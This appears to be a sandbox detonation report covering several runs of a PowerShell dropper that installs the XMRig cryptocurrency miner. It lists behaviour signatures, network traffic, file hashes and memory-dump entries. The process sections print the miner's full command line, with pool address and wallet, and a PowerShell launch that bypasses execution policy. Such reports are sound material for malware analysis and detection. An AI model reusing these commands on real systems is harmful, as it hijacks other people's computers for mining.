memory/5052-151-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-152-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-153-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-154-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-155-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
memory/5052-156-0x00007FF7E5060000-0x00007FF7E5C93000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:56
Platform
win10v2004-20240426-en
Max time kernel
1789s
Max time network
1783s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1468 wrote to memory of 3156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 1468 wrote to memory of 3156 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.173.79.40.in-addr.arpa | udp |
Files
memory/1468-0-0x00007FFB1E913000-0x00007FFB1E915000-memory.dmp
memory/1468-6-0x000001D9D3550000-0x000001D9D3572000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cbduaeo.gr3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1468-11-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/1468-12-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/1468-14-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/1468-15-0x000001D9D36E0000-0x000001D9D36F2000-memory.dmp
memory/1468-16-0x000001D9D36C0000-0x000001D9D36CA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3156-47-0x0000026E6AEF0000-0x0000026E6AF10000-memory.dmp
memory/3156-48-0x0000026E6AF40000-0x0000026E6AF60000-memory.dmp
memory/3156-49-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-52-0x0000026E6AF60000-0x0000026E6AF80000-memory.dmp
memory/3156-51-0x0000026E6C840000-0x0000026E6C860000-memory.dmp
memory/3156-50-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/1468-53-0x00007FFB1E913000-0x00007FFB1E915000-memory.dmp
memory/1468-54-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/3156-55-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/1468-56-0x00007FFB1E910000-0x00007FFB1F3D1000-memory.dmp
memory/3156-57-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-58-0x0000026E6C840000-0x0000026E6C860000-memory.dmp
memory/3156-59-0x0000026E6AF60000-0x0000026E6AF80000-memory.dmp
memory/3156-60-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-61-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-62-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-63-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-64-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-65-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-66-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-67-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-68-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-69-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-70-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-71-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-72-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-73-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-74-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-75-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-76-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-77-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-78-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-79-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-80-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-81-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-82-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-83-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-84-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-85-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-86-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-87-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-88-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-89-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-90-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-91-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-92-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-93-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-94-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-95-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-96-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-97-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-98-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-99-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-100-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-101-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-102-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-103-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-104-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-105-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-106-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-107-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-108-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-109-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-110-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-111-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-112-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-113-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-114-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-115-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-116-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-117-0x00007FF742B20000-0x00007FF743753000-memory.dmp
memory/3156-118-0x00007FF742B20000-0x00007FF743753000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:11
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1754s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2084 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2084 wrote to memory of 1700 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.94.73.104.in-addr.arpa | udp |
Files
memory/2084-3-0x00007FFB31903000-0x00007FFB31904000-memory.dmp
memory/2084-5-0x0000024FB11D0000-0x0000024FB11F2000-memory.dmp
memory/2084-7-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
memory/2084-11-0x0000024FCA240000-0x0000024FCA2B6000-memory.dmp
memory/2084-10-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_of3dc53w.dab.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2084-27-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
memory/2084-51-0x0000024FCA220000-0x0000024FCA232000-memory.dmp
memory/2084-64-0x0000024FCA200000-0x0000024FCA20A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1700-93-0x0000020C49AE0000-0x0000020C49B00000-memory.dmp
memory/1700-94-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/2084-95-0x00007FFB31900000-0x00007FFB322EC000-memory.dmp
memory/2084-97-0x00007FFB31903000-0x00007FFB31904000-memory.dmp
memory/1700-96-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-98-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-99-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-100-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-101-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-102-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-103-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-104-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-105-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-106-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-107-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-108-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-109-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-110-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-111-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-112-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-113-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-114-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-115-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-116-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-117-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-118-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-119-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-120-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-121-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-122-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-123-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-124-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-125-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-126-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-127-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-128-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-129-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-130-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-131-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-132-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-133-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-134-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-135-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-136-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-137-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-138-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-139-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-140-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-141-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-142-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-143-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-144-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-145-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-146-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-147-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-148-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-149-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-150-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-151-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-152-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-153-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-154-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-155-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-156-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-157-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
memory/1700-158-0x00007FF7F77A0000-0x00007FF7F83D3000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:19
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
